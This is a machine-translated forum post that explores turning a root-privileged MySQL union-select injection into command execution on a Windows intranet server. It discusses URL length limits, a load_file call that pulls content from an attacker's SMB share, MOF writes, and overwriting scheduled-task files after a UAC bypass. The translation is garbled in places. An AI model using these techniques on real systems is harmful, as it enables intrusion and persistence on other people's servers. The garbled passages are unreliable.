Ps: I think it is necessary to record the process of this exploration. If you have a better idea, please remind me...
Scenario:
Web-Internet, apache, PHP
Db-Intranet, mysql, win 6.1x64
A get union Select MySQLi is the Root permission. How can this problem be solved?
0 × 01 challenge I
Multi-statement execution problems, from very early on, including defcon documentation defcon-17-muhaimin_dzulfakar-adv_mysql-wp.pdf introduces advanced injection techniques, with the support of non-stacked query, are all around the union select, the union select statement is similar to load_file and out_file. some students said, PHP underlying restrictions MySQL multi-statement execution is used to break (see: http://zone.wooyun.org/index.php? Do = view & id = 50), but unfortunately, the PDO class is not used here. If you have more cool X and more cool, you are welcome to discuss it ~
0 × 02 challenge II
GET submission. According to the RFC documentation, we know that the URL has a length limit. If you want to directly run the 'Union select' statement to dump, it is hard to control the URL without encoding. however, after a simple thought, we found that some cases (for example, Shenma is a case because it cannot be confirmed by 100%) can actually shorten the URL restriction through load_file remote files.
Similar to select load_file ('// blackhat/Public/something_evil.txt'), blackhat enables simple sharing for Linux and Samba. testing in the same exchange environment can smoothly read the content, but put it on the public network for testing, it may time out, in addition, a large number of ISPs have actually killed 139,445 of the Upper-layer devices due to the shock wave from a long time ago, so the success rate of this attack is slightly lower, but what if you mentioned a root machine in section C?
0 × 03 challenge III
An attempt to change the write permission to immediate execution
Note that what I emphasize here is "immediate". Therefore, if Shenma writes a startup Item or DLL hijacking, It is not mentioned for the moment. similar to earlier windows versions (= <5.1), Kingsoft has used a special script to write data to mof to execute the command immediately, but it does not work in later versions. some may think of planning a task (JOB method ). in earlier versions of Windows, there is a Reg ing relationship in the Reg corresponding to the Job, and the Job will be placed under c: \ windows \ tasks. The corresponding Registry path is, therefore, it is generally problematic to directly submit the job file. in the new version, I didn't search for related information in reg at first, and changed the configuration file to xml and put it in the new path c: \ windows \ system32 \ tasks, it is assumed that writing new configurations directly to the directory will load and run the configurations, in fact, he will get a CLSID from [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Schedule \ TaskCache \ Tasks, the CLSID corresponds to the key value under [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Schedule \ TaskCache \ Tree]. Since you cannot add a scheduled task by creating a new configuration, so we will replace the configuration file with the same name. after the test, it is found that the file can be replaced (if UAC is available in a higher version, UAC is bypassed first ). however, the scheduler reads the corresponding configuration from TaskCache first. so this cannot be done.
Looking back, there will certainly be a lot of security concessions for the business in a huge and exposed Windows System (bypassing UAC is a typical example ), how did he find Kingdee? Is this system feature Fuzz from a large number of samples? Or do we respect certain system principles and trace them back from functions? In this example, some friends around the world, such as WEB code auditing, may look for entry points first, and then track data streams to audit SQL injection, however, my friend complained about a large number of input points in the Fuzz functional area, and then searched for exceptions directly from the DB logs. I have to say that the efficiency has improved a lot and it has been accurate.
As the saying goes, from today's test, we are still not familiar with some features, and we can go further with an open vision!
Update the train of thought (thanks to the experts ):
1. Fuzz some third-party programs that will be written to the configuration and so on and executed immediately
2. Replace the EXE in the scheduled task (find the rule for the shortest execution)
[If any error occurs in this article, I am not very grateful]